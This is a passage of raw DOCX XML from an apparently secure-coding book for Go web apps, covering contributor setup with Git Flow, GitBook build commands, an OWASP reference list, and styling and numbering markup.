        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId124" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Git Flow Hooks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - some useful hooks for git-flow (AVH Edition) by </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Jaspern Brouwer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The book sources are written on </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Markdown format</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, taking advantage of </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>gitbook-cli</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="104" w:name="Environment_setup"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Environment setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>If you want to contribute to this book, you should setup the following tools on your system:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To install Git, please follow the </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>official instructions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> according to your system's configuration;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that you have Git, you should </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>install Git Flow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Git Flow Hooks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Last but not least, </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>setup GitBook CLI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="105" w:name="How_to_start"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>How to start</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Ok, now you're ready to contribute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fork the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>go-webapp-scp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> repo and then clone your own repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The next step is to enable Git Flow hooks; enter your local repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ cd go-webapp-scp
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>and run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ git flow init
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>We're good to go with git flow default values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>In a nutshell, everytime you want to work on a section, you should start a "feature":</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ git flow feature start my-new-section
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>To keep your work safe, don't forget to publish your feature:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ git flow feature publish
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once you're ready to merge your work with others, you should go to the main repository and open a </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Pull Request</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch. Then, someone will review your work, leave any comments, request changes and/or simply merge it on branch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of project's main repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As soon as this happens, you'll need to pull the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch to keep your own </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch updated with the upstream. The same way as on a release, you should update your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>When you find a typo or something that needs to be fixed, you should start a "hotfix"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ git flow hotfix start
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This will apply your change on both </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As you can see, until now there were no commits to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch. Great! This is reserved for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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4"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ npm run serve
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The shell output will include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL where you can preview the book.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="106" w:name="How_to_Build"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>How to Build</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The book can be compile:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using a Docker container (requires </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>docker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to be installed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ [ ! -z $(docker images -q goscp-builder) ] || docker build -t goscp-builder . \
    &amp;&amp; docker run -v $(pwd):/build --rm goscp-builder npm run build
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in your workstation, running (requires </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>node</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>calibre</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to be installed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ npm run build
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="107" w:name="Final_Notes"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Final Notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>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5"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:tooltip="">
        <w:r>
          <w:t>OWASP Secure Coding Practices - Quick Reference Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId59" w:tooltip="">
        <w:r>
          <w:t>OWASP Top Ten Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId136" w:tooltip="">
        <w:r>
          <w:t>OWASP Testing Guide Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId137" w:tooltip="">
        <w:r>
          <w:t>Check OWASP Cheat Sheet Series</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240"/>
      <w:pgMar w:left="1440" w:right="1440" w:bottom="1440" w:top="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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:name w:val="List 7"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:p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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:p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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:p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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:name w:val="List 24"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:p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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:name w:val="List 29"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:name w:val="List 30"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:name w:val="List 31"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:r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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:r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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:r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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:r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en" w:bidi="en" w:val="en"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto" w:line="276"/>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Heading 1" w:type="paragraph">
    <w:name w:val="Heading 1"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:beforeLines="120" w:line="576" w:lineRule="atLeast"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 04" w:type="paragraph">
    <w:name w:val="Para 04"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:afterLines="120"/>
      <w:shd w:color="auto" w:fill="F7F7F7" w:val="clear"/>
      <w:pBdr>
        <w:left w:space="12"/>
        <w:top w:space="10"/>
        <w:right w:space="12"/>
        <w:bottom w:space="10"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:fill="F7F7F7"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 05" w:type="paragraph">
    <w:name w:val="Para 05"/>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E908C"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 06" w:type="paragraph">
    <w:name w:val="Para 06"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="57"/>
      <w:pBdr>
        <w:bottom w:val="dotted" w:sz="5" w:color="EEEEEE"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 07" w:type="paragraph">
    <w:name w:val="Para 0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8959A8"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 08" w:type="paragraph">
    <w:name w:val="Para 08"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:afterLines="120"/>
      <w:shd w:color="auto" w:fill="F7F7F7" w:val="clear"/>
      <w:pBdr>
        <w:left w:space="12"/>
        <w:top w:space="10"/>
        <w:right w:space="12"/>
        <w:bottom w:space="10"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 09" w:type="paragraph">
    <w:name w:val="Para 09"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:color w:val="0000FF"/>
      <w:shd w:fill="F7F7F7"/>
      <w:u w:val="single"/>
      <w:bdr w:space="1"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 10" w:type="paragraph">
    <w:name w:val="Para 10"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:i w:val="on"/>
      <w:iCs w:val="on"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 11" w:type="paragraph">
    <w:name w:val="Para 11"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:afterLines="80" w:line="384" w:lineRule="atLeast"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:i w:val="on"/>
      <w:iCs w:val="on"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 12" w:type="paragraph">
    <w:name w:val="Para 12"/>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3" w:type="paragraph">
    <w:name w:val="Para 13"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>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color="auto" w:fill="F7F7F7" w:val="clear"/>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pBdr>
        <w:left w:space="10" w:val="single" w:sz="23" w:color="E5E5E5"/>
        <w:right w:space="10"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:color w:val="858585"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 20" w:type="paragraph">
    <w:name w:val="Para 20"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:afterLines="80" w:line="384" w:lineRule="atLeast"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 21" w:type="paragraph">
    <w:name w:val="Para 21"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:beforeLines="120" w:line="576" w:lineRule="atLeast"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 22" w:type="paragraph">
    <w:name w:val="Para 22"/>
    <w:qFormat/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:space="10" w:val="single" w:sz="23" w:color="E5E5E5"/>
        <w:right w:space="10"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Para 23" w:type="paragraph">
    <w:name w:val="Para 23"/>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0 Text"/>
    <w:rPr>
      <w:i w:val="on"/>
      <w:iCs w:val="on"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text1" w:type="character">
    <w:name w:val="01 Text"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text2" w:type="character">
    <w:name w:val="02 Text"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:fill="F7F7F7"/>
      <w:bdr w:space="1"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text3" w:type="character">
    <w:name w:val="03 Text"/>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text4" w:type="character">
    <w:name w:val="04 Text"/>
    <w:rPr>
      <w:i w:val="on"/>
      <w:iCs w:val="on"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text5" w:type="character">
    <w:name w:val="05 Text"/>
    <w:rPr>
      <w:color w:val="858585"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text6" w:type="character">
    <w:name w:val="06 Text"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:color w:val="0000FF"/>
      <w:shd w:fill="F7F7F7"/>
      <w:u w:val="single"/>
      <w:bdr w:space="1"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text7" w:type="character">
    <w:name w:val="07 Text"/>
    <w:rPr>
      <w:color w:val="C82829"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text8" w:type="character">
    <w:name w:val="08 Text"/>
    <w:rPr>
      <w:shd w:fill="F7F7F7"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text9" w:type="character">
    <w:name w:val="09 Text"/>
    <w:rPr>
      <w:color w:val="4271AE"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text10" w:type="character">
    <w:name w:val="10 Text"/>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:shd w:fill="F7F7F7"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text11" w:type="character">
    <w:name w:val="11 Text"/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text12" w:type="character">
    <w:name w:val="12 Text"/>
    <w:rPr>
      <w:color w:val="F5871F"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text13" w:type="character">
    <w:name w:val="13 Text"/>
    <w:rPr>
      <w:color w:val="718C00"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text14" w:type="character">
    <w:name w:val="14 Text"/>
    <w:rPr>
      <w:color w:val="8959A8"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text15" w:type="character">
    <w:name w:val="15 Text"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:i w:val="on"/>
      <w:iCs w:val="on"/>
      <w:shd w:fill="F7F7F7"/>
      <w:bdr w:space="1"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Text16" w:type="character">
    <w:name w:val="16 Text"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
      <w:shd w:fill="F7F7F7"/>
      <w:bdr w:space="3"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="0 Block" w:type="paragraph">
    <w:name w:val="0 Block"/>
    <w:pPr>
      <w:spacing w:beforeLines="160" w:afterLines="160" w:line="384" w:lineRule="atLeast"/>
